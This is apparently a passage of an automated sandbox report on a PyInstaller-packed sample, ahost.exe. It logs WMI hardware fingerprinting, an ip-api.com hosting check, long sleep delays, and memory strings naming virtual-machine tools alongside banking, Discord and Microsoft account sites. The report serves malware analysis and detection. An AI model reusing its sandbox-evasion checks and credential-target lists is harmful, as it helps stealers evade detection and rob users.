              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\getmac.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.2.3
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : ASSOCIATORS OF {Win32_NetworkAdapter.DeviceID=&quot;1&quot;} WHERE ResultClass=Win32_NetworkAdapterConfiguration
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapterSetting where Element=&quot;Win32_NetworkAdapter.DeviceID=\&quot;1\&quot;&quot;
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6692Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 965Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6941
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 821
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6894
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2663
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1445
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5203
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1458
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3495
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2495
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3796
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1531
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3441
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 399
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3360
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 537
              Source: C:\Users\user\Desktop\ahost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI72722\unicodedata.pydJump to dropped file
              Source: C:\Users\user\Desktop\ahost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI72722\_sqlite3.pydJump to dropped file
              Source: C:\Users\user\Desktop\ahost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI72722\python313.dllJump to dropped file
              Source: C:\Users\user\Desktop\ahost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI72722\_decimal.pydJump to dropped file
              Source: C:\Users\user\Desktop\ahost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI72722\select.pydJump to dropped file
              Source: C:\Users\user\Desktop\ahost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI72722\_ssl.pydJump to dropped file
              Source: C:\Users\user\Desktop\ahost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI72722\_queue.pydJump to dropped file
              Source: C:\Users\user\Desktop\ahost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI72722\_socket.pydJump to dropped file
              Source: C:\Users\user\Desktop\ahost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI72722\_bz2.pydJump to dropped file
              Source: C:\Users\user\Desktop\ahost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI72722\_lzma.pydJump to dropped file
              Source: C:\Users\user\Desktop\ahost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI72722\_hashlib.pydJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ohbt5slp\ohbt5slp.dllJump to dropped file
              Source: C:\Users\user\Desktop\ahost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI72722\_ctypes.pydJump to dropped file
              Source: C:\Users\user\Desktop\ahost.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-17438
              Source: C:\Users\user\Desktop\ahost.exeAPI coverage: 9.6 %
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7860Thread sleep count: 6692 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7964Thread sleep time: -9223372036854770s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7860Thread sleep count: 965 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7920Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7856Thread sleep count: 6941 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7868Thread sleep count: 821 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7960Thread sleep time: -6456360425798339s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7904Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\svchost.exe TID: 8152Thread sleep time: -30000s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1692Thread sleep count: 6894 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1616Thread sleep count: 2663 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1556Thread sleep time: -2767011611056431s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8036Thread sleep count: 1445 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8156Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8112Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 916Thread sleep count: 5203 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5452Thread sleep time: -8301034833169293s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 916Thread sleep count: 1458 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6224Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7460Thread sleep count: 3495 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7460Thread sleep count: 2495 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8036Thread sleep time: -3689348814741908s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7664Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4904Thread sleep count: 3796 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7760Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5544Thread sleep count: 1531 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6896Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7264Thread sleep count: 3441 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7264Thread sleep count: 399 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5388Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2508Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 316Thread sleep count: 3360 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 316Thread sleep count: 537 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2984Thread sleep time: -2767011611056431s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3352Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
              Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
              Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
              Source: C:\Windows\System32\attrib.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\ahost.exeCode function: 0_2_00007FF7F91E92F0 FindFirstFileExW,FindClose,0_2_00007FF7F91E92F0
              Source: C:\Users\user\Desktop\ahost.exeCode function: 0_2_00007FF7F91E83B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00007FF7F91E83B0
              Source: C:\Users\user\Desktop\ahost.exeCode function: 0_2_00007FF7F92018E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF7F92018E4
              Source: C:\Users\user\Desktop\ahost.exeCode function: 2_2_00007FF7F91E92F0 FindFirstFileExW,FindClose,2_2_00007FF7F91E92F0
              Source: C:\Users\user\Desktop\ahost.exeCode function: 2_2_00007FF7F91E83B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,2_2_00007FF7F91E83B0
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF8A46EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,104_2_00007FF7CF8A46EC
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF8E88E0 FindFirstFileExA,104_2_00007FF7CF8E88E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF89E21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle,104_2_00007FF7CF89E21C
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: getmac.exe, 00000050.00000002.1620437806.0000015C237F3000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000050.00000003.1618251992.0000015C237F3000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000050.00000003.1618251992.0000015C237CA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V
              Source: ahost.exe, 00000002.00000003.1629779862.000002162D0E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696497155
              Source: ahost.exe, 00000002.00000002.1870398266.000002162BF00000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vboxservice
              Source: ahost.exe, 00000002.00000003.1629779862.000002162D0E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
              Source: getmac.exe, 00000050.00000002.1620437806.0000015C237F3000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000050.00000003.1618251992.0000015C237F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage"
              Source: ahost.exe, 00000002.00000003.1579668380.000002162BE02000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1619630084.000002162BE11000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1869730521.000002162BE11000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.2645547592.0000021787458000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000050.00000002.1620437806.0000015C237F3000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000050.00000003.1618251992.0000015C237F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: ahost.exe, 00000002.00000002.1870398266.000002162BF00000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmsrvc
              Source: ahost.exe, 00000002.00000002.1870398266.000002162BF00000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: decodeqemu-ga
              Source: getmac.exe, 00000050.00000002.1620437806.0000015C237F3000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000050.00000003.1618251992.0000015C237F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_NetworkProtocolHyper-V RAWHyper-VRAWHyper-V RAW!
              Source: ahost.exe, 00000002.00000003.1629779862.000002162D0E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696497155
              Source: ahost.exe, 00000002.00000003.1629779862.000002162D0E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696497155x
              Source: ahost.exe, 00000002.00000003.1629779862.000002162D0E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
              Source: ahost.exe, 00000002.00000003.1629779862.000002162D0E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
              Source: ahost.exe, 00000002.00000003.1629779862.000002162D0E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696497155d
              Source: ahost.exe, 00000002.00000003.1629779862.000002162D0E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696497155x
              Source: ahost.exe, 00000002.00000002.1870398266.000002162BF00000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: qemu-ga
              Source: ahost.exe, 00000002.00000002.1870398266.000002162BF00000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmware
              Source: ahost.exe, 00000002.00000002.1870398266.000002162BF00000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: /f15vmsrvc
              Source: ahost.exe, 00000002.00000002.1870398266.000002162BF00000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmusrvc
              Source: ahost.exe, 00000002.00000003.1416587840.000002162BD54000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmware)
              Source: ahost.exe, 00000002.00000003.1629779862.000002162D0E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696497155}
              Source: ahost.exe, 00000002.00000003.1629779862.000002162D0E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
              Source: ahost.exe, 00000002.00000003.1629779862.000002162D0E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696497155u
              Source: ahost.exe, 00000002.00000003.1629779862.000002162D0E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696497155f
              Source: ahost.exe, 00000002.00000003.1629779862.000002162D0E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696497155
              Source: ahost.exe, 00000002.00000003.1629779862.000002162D0E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
              Source: ahost.exe, 00000002.00000003.1629779862.000002162D0E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696497155s
              Source: ahost.exe, 00000002.00000003.1629779862.000002162D0E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
              Source: ahost.exe, 00000002.00000002.1870398266.000002162BF00000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwareservice
